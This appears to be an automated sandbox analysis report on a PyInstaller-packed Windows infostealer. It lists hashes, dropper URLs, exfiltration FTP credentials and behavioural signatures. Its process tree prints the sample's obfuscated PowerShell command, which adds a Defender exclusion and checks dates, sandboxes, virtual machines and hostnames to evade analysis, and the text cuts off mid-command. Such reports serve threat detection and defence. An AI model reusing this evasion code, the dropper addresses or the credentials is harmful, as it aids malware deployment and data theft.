023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e

Analysis

max time kernel
142s
max time network
111s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
24-04-2023 17:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
Size

30.7MB
MD5

9650ac3a9de8d51fddab092c7956bdae
SHA1

f52b9ec5b9629a746c679394953dc56407b8a419
SHA256

023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e
SHA512

82cd32a8b5b84c067a7a7989831041b4453f7ed7cc5ee4308e7dc5e495410267e03b6ea9ad3441adfa5e0313e274b2f43976121959d2c72b80d00719bb91d14e
SSDEEP

196608:TQ6kL2Vmd6+DXLZy7YM30Lzajzpj4sd5bL:vkL2Vmd6m70Gzajz9Pd5n

Score

10^/10

pyinstaller spyware stealer

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://193.42.33.232/meokl/KK2023.zip

exe.dropper

http://193.42.33.232/alheim/Confirm.zip

exe.dropper

http://193.42.33.232/mrytr/MnMs.zip

Extracted

Credentials

Protocol: ftp
Host:
89.116.53.55
Port:
21
Username:
u999382941
Password:
Test1234

Signatures

Blocklisted process makes network request 19 IoCs

Processes:

powershell.exe

flow	pid	process
33	3260	powershell.exe
41	3260	powershell.exe
57	3260	powershell.exe
58	3260	powershell.exe
59	3260	powershell.exe
61	3260	powershell.exe
62	3260	powershell.exe
63	3260	powershell.exe
64	3260	powershell.exe
65	3260	powershell.exe
67	3260	powershell.exe
68	3260	powershell.exe
69	3260	powershell.exe
70	3260	powershell.exe
71	3260	powershell.exe
72	3260	powershell.exe
73	3260	powershell.exe
74	3260	powershell.exe
75	3260	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation cmd.exe
Executes dropped EXE 4 IoCs

Processes:

Lst.exeLst.exeConfirm.exeConfirm.exe

pid process

1480 Lst.exe
2756 Lst.exe
1692 Confirm.exe
2508 Confirm.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
1480	Lst.exe
2756	Lst.exe
1692	Confirm.exe
2508	Confirm.exe

Loads dropped DLL 49 IoCs

Processes:

023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exeLst.exeConfirm.exe

pid	process
1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2756	Lst.exe
2508	Confirm.exe
2508	Confirm.exe
2508	Confirm.exe
2508	Confirm.exe
2508	Confirm.exe
2508	Confirm.exe
2508	Confirm.exe
2508	Confirm.exe
2508	Confirm.exe
2508	Confirm.exe
2508	Confirm.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

32 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exeLst.exeConfirm.exe

pid process

1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
2756 Lst.exe
2508 Confirm.exe

flow	ioc
32	ipinfo.io

Detects Pyinstaller 5 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\NewStream\Lst.exe	pyinstaller
C:\Users\Admin\AppData\Local\NewStream\Lst.exe	pyinstaller
C:\Users\Admin\AppData\Local\NewStream\Lst.exe	pyinstaller
C:\Users\Admin\AppData\Local\NewStream\Lst.exe	pyinstaller
C:\Users\Admin\AppData\Roaming\Google-Update\Confirm.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings cmd.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

628 NOTEPAD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3224 powershell.exe
3224 powershell.exe
3260 powershell.exe
3260 powershell.exe
3864 powershell.exe
3864 powershell.exe
3864 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	cmd.exe

pid	process
628	NOTEPAD.EXE

pid	process
3224	powershell.exe
3224	powershell.exe
3260	powershell.exe
3260	powershell.exe
3864	powershell.exe
3864	powershell.exe
3864	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeIncreaseQuotaPrivilege	3224	powershell.exe
Token: SeSecurityPrivilege	3224	powershell.exe
Token: SeTakeOwnershipPrivilege	3224	powershell.exe
Token: SeLoadDriverPrivilege	3224	powershell.exe
Token: SeSystemProfilePrivilege	3224	powershell.exe
Token: SeSystemtimePrivilege	3224	powershell.exe
Token: SeProfSingleProcessPrivilege	3224	powershell.exe
Token: SeIncBasePriorityPrivilege	3224	powershell.exe
Token: SeCreatePagefilePrivilege	3224	powershell.exe
Token: SeBackupPrivilege	3224	powershell.exe
Token: SeRestorePrivilege	3224	powershell.exe
Token: SeShutdownPrivilege	3224	powershell.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeSystemEnvironmentPrivilege	3224	powershell.exe
Token: SeRemoteShutdownPrivilege	3224	powershell.exe
Token: SeUndockPrivilege	3224	powershell.exe
Token: SeManageVolumePrivilege	3224	powershell.exe
Token: 33	3224	powershell.exe
Token: 34	3224	powershell.exe
Token: 35	3224	powershell.exe
Token: 36	3224	powershell.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeIncreaseQuotaPrivilege	3260	powershell.exe
Token: SeSecurityPrivilege	3260	powershell.exe
Token: SeTakeOwnershipPrivilege	3260	powershell.exe
Token: SeLoadDriverPrivilege	3260	powershell.exe
Token: SeSystemProfilePrivilege	3260	powershell.exe
Token: SeSystemtimePrivilege	3260	powershell.exe
Token: SeProfSingleProcessPrivilege	3260	powershell.exe
Token: SeIncBasePriorityPrivilege	3260	powershell.exe
Token: SeCreatePagefilePrivilege	3260	powershell.exe
Token: SeBackupPrivilege	3260	powershell.exe
Token: SeRestorePrivilege	3260	powershell.exe
Token: SeShutdownPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeSystemEnvironmentPrivilege	3260	powershell.exe
Token: SeRemoteShutdownPrivilege	3260	powershell.exe
Token: SeUndockPrivilege	3260	powershell.exe
Token: SeManageVolumePrivilege	3260	powershell.exe
Token: 33	3260	powershell.exe
Token: 34	3260	powershell.exe
Token: 35	3260	powershell.exe
Token: 36	3260	powershell.exe
Token: SeIncreaseQuotaPrivilege	3260	powershell.exe
Token: SeSecurityPrivilege	3260	powershell.exe
Token: SeTakeOwnershipPrivilege	3260	powershell.exe
Token: SeLoadDriverPrivilege	3260	powershell.exe
Token: SeSystemProfilePrivilege	3260	powershell.exe
Token: SeSystemtimePrivilege	3260	powershell.exe
Token: SeProfSingleProcessPrivilege	3260	powershell.exe
Token: SeIncBasePriorityPrivilege	3260	powershell.exe
Token: SeCreatePagefilePrivilege	3260	powershell.exe
Token: SeBackupPrivilege	3260	powershell.exe
Token: SeRestorePrivilege	3260	powershell.exe
Token: SeShutdownPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeSystemEnvironmentPrivilege	3260	powershell.exe
Token: SeRemoteShutdownPrivilege	3260	powershell.exe
Token: SeUndockPrivilege	3260	powershell.exe
Token: SeManageVolumePrivilege	3260	powershell.exe
Token: 33	3260	powershell.exe
Token: 34	3260	powershell.exe
Token: 35	3260	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Confirm.exe

pid process

2508 Confirm.exe

pid	process
2508	Confirm.exe

Suspicious use of WriteProcessMemory 38 IoCs

Processes:

023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.execmd.exepowershell.exeLst.exeLst.exeConfirm.exeConfirm.exepowershell.exe

description	pid	process	target process
PID 4084 wrote to memory of 1064	4084	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
PID 4084 wrote to memory of 1064	4084	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
PID 1064 wrote to memory of 3992	1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe	cmd.exe
PID 1064 wrote to memory of 3992	1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe	cmd.exe
PID 1064 wrote to memory of 3224	1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe	powershell.exe
PID 1064 wrote to memory of 3224	1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe	powershell.exe
PID 1064 wrote to memory of 3824	1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe	cmd.exe
PID 1064 wrote to memory of 3824	1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe	cmd.exe
PID 1064 wrote to memory of 3260	1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe	powershell.exe
PID 1064 wrote to memory of 3260	1064	023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe	powershell.exe
PID 3824 wrote to memory of 628	3824	cmd.exe	NOTEPAD.EXE
PID 3824 wrote to memory of 628	3824	cmd.exe	NOTEPAD.EXE
PID 3260 wrote to memory of 1316	3260	powershell.exe	HOSTNAME.EXE
PID 3260 wrote to memory of 1316	3260	powershell.exe	HOSTNAME.EXE
PID 3260 wrote to memory of 672	3260	powershell.exe	HOSTNAME.EXE
PID 3260 wrote to memory of 672	3260	powershell.exe	HOSTNAME.EXE
PID 3260 wrote to memory of 3988	3260	powershell.exe	netsh.exe
PID 3260 wrote to memory of 3988	3260	powershell.exe	netsh.exe
PID 3260 wrote to memory of 1480	3260	powershell.exe	Lst.exe
PID 3260 wrote to memory of 1480	3260	powershell.exe	Lst.exe
PID 1480 wrote to memory of 2756	1480	Lst.exe	Lst.exe
PID 1480 wrote to memory of 2756	1480	Lst.exe	Lst.exe
PID 2756 wrote to memory of 4712	2756	Lst.exe	cmd.exe
PID 2756 wrote to memory of 4712	2756	Lst.exe	cmd.exe
PID 3260 wrote to memory of 844	3260	powershell.exe	HOSTNAME.EXE
PID 3260 wrote to memory of 844	3260	powershell.exe	HOSTNAME.EXE
PID 3260 wrote to memory of 2640	3260	powershell.exe	HOSTNAME.EXE
PID 3260 wrote to memory of 2640	3260	powershell.exe	HOSTNAME.EXE
PID 3260 wrote to memory of 1692	3260	powershell.exe	Confirm.exe
PID 3260 wrote to memory of 1692	3260	powershell.exe	Confirm.exe
PID 1692 wrote to memory of 2508	1692	Confirm.exe	Confirm.exe
PID 1692 wrote to memory of 2508	1692	Confirm.exe	Confirm.exe
PID 2508 wrote to memory of 1552	2508	Confirm.exe	cmd.exe
PID 2508 wrote to memory of 1552	2508	Confirm.exe	cmd.exe
PID 2508 wrote to memory of 3864	2508	Confirm.exe	powershell.exe
PID 2508 wrote to memory of 3864	2508	Confirm.exe	powershell.exe
PID 3864 wrote to memory of 1412	3864	powershell.exe	HOSTNAME.EXE
PID 3864 wrote to memory of 1412	3864	powershell.exe	HOSTNAME.EXE

C:\Users\Admin\AppData\Local\Temp\023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
"C:\Users\Admin\AppData\Local\Temp\023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4084

C:\Users\Admin\AppData\Local\Temp\023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
"C:\Users\Admin\AppData\Local\Temp\023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe"
2⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
3⤵
PID:3992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "$IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model;$IsVirtual"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40842\1.txt"
3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3824

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\_MEI40842\1.txt
4⤵
- Opens file in notepad (likely ransom note)
PID:628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass "$startdate=(Get-Date 2022-11-09).toString(\"yyyy-MM-dd\") $enddate=(Get-Date 2024-03-04).toString(\"yyyy-MM-dd\") $today=Get-Date -format yyyy-MM-dd function IsInWindowsSandbox { $inSandbox = $false $env:SandboxProfilePath = $null $env:SandboxUid = $null if ($env:WSB_IsHostEnvironment -eq \"1\" -and $env:WSB_Sandboxed -eq \"1\") { $inSandbox = $true $env:SandboxProfilePath = $env:WSB_ProfilePath $env:SandboxUid = $env:WSB_Uid } return $inSandbox } if (IsInWindowsSandbox) { exit } else { if($today -ge $startdate -and $today -le $enddate){ $ProgressPreference = \"S\"+\"i\"+\"l\"+\"e\"+\"n\"+\"t\"+\"l\"+\"y\"+\"C\"+\"o\"+\"n\"+\"t\"+\"i\"+\"n\"+\"u\"+\"e\" $ErrorActionPreference = \"S\"+\"i\"+\"l\"+\"e\"+\"n\"+\"t\"+\"l\"+\"y\"+\"C\"+\"o\"+\"n\"+\"t\"+\"i\"+\"n\"+\"u\"+\"e\" $new_line= \"A\"+\"d\"+\"d\"+\"-\"+\"M\"+\"p\"+\"P\"+\"r\"+\"e\"+\"f\"+\"e\"+\"r\"+\"e\"+\"n\"+\"c\"+\"e\"+\" -E\"+\"x\"+\"c\"+\"l\"+\"u\"+\"s\"+\"i\"+\"o\"+\"n\"+\"P\"+\"a\"+\"t\"+\"h\";$last_line=\"$pwd\".SubString(0,3);Invoke-Expression \"$new_line $last_line -Force\" $IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model if ($IsVirtual -eq 'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x'){ exit }elseif($IsVirtual -eq 'V'+'M'+'W'+'a'+'r'+'e') { exit }elseif($IsVirtual -eq 'H'+'y'+'p'+'e'+'r'+'-'+'V') { exit }elseif($IsVirtual -eq 'P'+'a'+'r'+'a'+'l'+'l'+'e'+'l'+'s') { exit }elseif($IsVirtual -eq 'O'+'r'+'a'+'c'+'l'+'e'+' '+'V'+'M'+' '+'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x') { exit }elseif($IsVirtual -eq 'C'+'i'+'t'+'r'+'i'+'x'+' '+'H'+'y'+'p'+'e'+'r'+'v'+'i'+'s'+'o'+'r') { exit }elseif($IsVirtual -eq 'Q'+'E'+'M'+'U') { exit }elseif($IsVirtual -eq 'K'+'V'+'M') { exit }elseif($IsVirtual -eq 'P'+'r'+'o'+'x'+'m'+'o'+'x'+' '+'V'+'E') { exit }elseif($IsVirtual -eq 'D'+'o'+'c'+'k'+'e'+'r') { exit }else { $HNAME2023=hostname if ($HNAME2023 -eq '0'+'0'+'9'+'0'+'0'+'B'+'C'+'8'+'3'+'8'+'0'+'3') { exit } if ($HNAME2023 -eq '0'+'C'+'C'+'4'+'7'+'A'+'C'+'8'+'3'+'8'+'0'+'3') { exit } if ($HNAME2023 -eq '6'+'C'+'4'+'E'+'7'+'3'+'3'+'F'+'-'+'C'+'2'+'D'+'9'+'-'+'4') { exit } if ($HNAME2023 -eq 'A'+'C'+'E'+'P'+'C') { exit } if ($HNAME2023 -eq 'A'+'I'+'D'+'A'+'N'+'P'+'C') { exit } if ($HNAME2023 -eq 'A'+'L'+'E'+'N'+'M'+'O'+'O'+'S'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'A'+'L'+'I'+'O'+'N'+'E') { exit } if ($HNAME2023 -eq 'A'+'P'+'P'+'O'+'N'+'F'+'L'+'Y'+'-'+'V'+'P'+'S') { exit } if ($HNAME2023 -eq 'A'+'R'+'C'+'H'+'I'+'B'+'A'+'L'+'D'+'P'+'C') { exit } if ($HNAME2023 -eq 'a'+'z'+'u'+'r'+'e') { exit } if ($HNAME2023 -eq 'B'+'3'+'0'+'F'+'0'+'2'+'4'+'2'+'-'+'1'+'C'+'6'+'A'+'-'+'4') { exit } if ($HNAME2023 -eq 'B'+'A'+'R'+'O'+'S'+'I'+'N'+'O'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'B'+'E'+'C'+'K'+'E'+'R'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'B'+'E'+'E'+'7'+'3'+'7'+'0'+'C'+'-'+'8'+'C'+'0'+'C'+'-'+'4') { exit } if ($HNAME2023 -eq 'C'+'O'+'F'+'F'+'E'+'E'+'-'+'S'+'H'+'O'+'P') { exit } if ($HNAME2023 -eq 'C'+'O'+'M'+'P'+'N'+'A'+'M'+'E'+'_'+'4'+'0'+'4'+'7') { exit } if ($HNAME2023 -eq 'd'+'1'+'b'+'n'+'J'+'k'+'f'+'V'+'l'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'1'+'9'+'O'+'L'+'L'+'T'+'D') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'1'+'P'+'Y'+'K'+'P'+'2'+'9') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'1'+'Y'+'2'+'4'+'3'+'3'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'4'+'U'+'8'+'D'+'T'+'F'+'8') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'5'+'4'+'X'+'G'+'X'+'6'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'5'+'O'+'V'+'9'+'S'+'0'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'A'+'K'+'Q'+'Q'+'A'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'B'+'M'+'F'+'T'+'6'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'7'+'0'+'T'+'5'+'S'+'D'+'X') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'7'+'A'+'F'+'S'+'T'+'D'+'P') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'7'+'X'+'C'+'6'+'G'+'E'+'Z') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'8'+'K'+'9'+'D'+'9'+'3'+'B') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'A'+'H'+'G'+'X'+'K'+'T'+'V') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'A'+'L'+'B'+'E'+'R'+'T'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'0'+'T'+'9'+'3'+'D'+'6') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'G'+'N'+'5'+'L'+'8'+'Y') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'U'+'G'+'I'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'X'+'J'+'Y'+'A'+'E'+'C') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'B'+'G'+'P'+'F'+'E'+'E') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'D'+'Q'+'E'+'7'+'V'+'N') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'H'+'A'+'Y'+'A'+'N'+'N') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'M'+'0'+'D'+'A'+'W'+'8') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'N'+'F'+'V'+'L'+'M'+'W') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'R'+'C'+'C'+'C'+'O'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'0'+'1'+'9'+'G'+'D'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'4'+'F'+'E'+'N'+'3'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'E'+'3'+'6'+'9'+'S'+'E') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'I'+'L'+'6'+'I'+'Y'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'E'+'C'+'W'+'Z'+'X'+'Y'+'2') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'7'+'B'+'G'+'E'+'N'+'9') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'S'+'H'+'H'+'Z'+'L'+'J') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'4'+'C'+'W'+'F'+'L'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'E'+'L'+'A'+'T'+'O'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'L'+'B'+'A'+'Z'+'X'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'N'+'Q'+'Z'+'M'+'0'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'P'+'P'+'K'+'5'+'V'+'Q') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'H'+'A'+'S'+'A'+'N'+'L'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'H'+'Q'+'L'+'U'+'W'+'F'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'H'+'S'+'S'+'0'+'D'+'J'+'9') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'I'+'A'+'P'+'K'+'N'+'1'+'P') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'I'+'F'+'C'+'A'+'Q'+'V'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'I'+'O'+'N'+'5'+'Z'+'S'+'B') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'J'+'Q'+'P'+'I'+'F'+'W'+'D') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'K'+'A'+'L'+'V'+'I'+'N'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'K'+'O'+'K'+'O'+'V'+'S'+'K') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'A'+'K'+'F'+'F'+'M'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'K'+'P'+'0'+'I'+'4'+'P') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'M'+'1'+'Z'+'P'+'L'+'G') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'T'+'U'+'7'+'V'+'U'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Q'+'U'+'A'+'Y'+'8'+'G'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'C'+'A'+'3'+'Q'+'W'+'X') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'H'+'X'+'D'+'K'+'W'+'W') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'1'+'L'+'F'+'P'+'H'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'U'+'P'+'E'+'R'+'I'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'1'+'L'+'2'+'6'+'J'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'I'+'R'+'E'+'N'+'D'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'K'+'N'+'F'+'F'+'B'+'6') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'R'+'S'+'Q'+'L'+'A'+'G') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'W'+'J'+'U'+'7'+'M'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'Z'+'5'+'Z'+'S'+'Y'+'I') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'8'+'J'+'L'+'V'+'9'+'V') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'G'+'3'+'M'+'Y'+'J'+'S') { exit } if ($HNAME2023 -eq 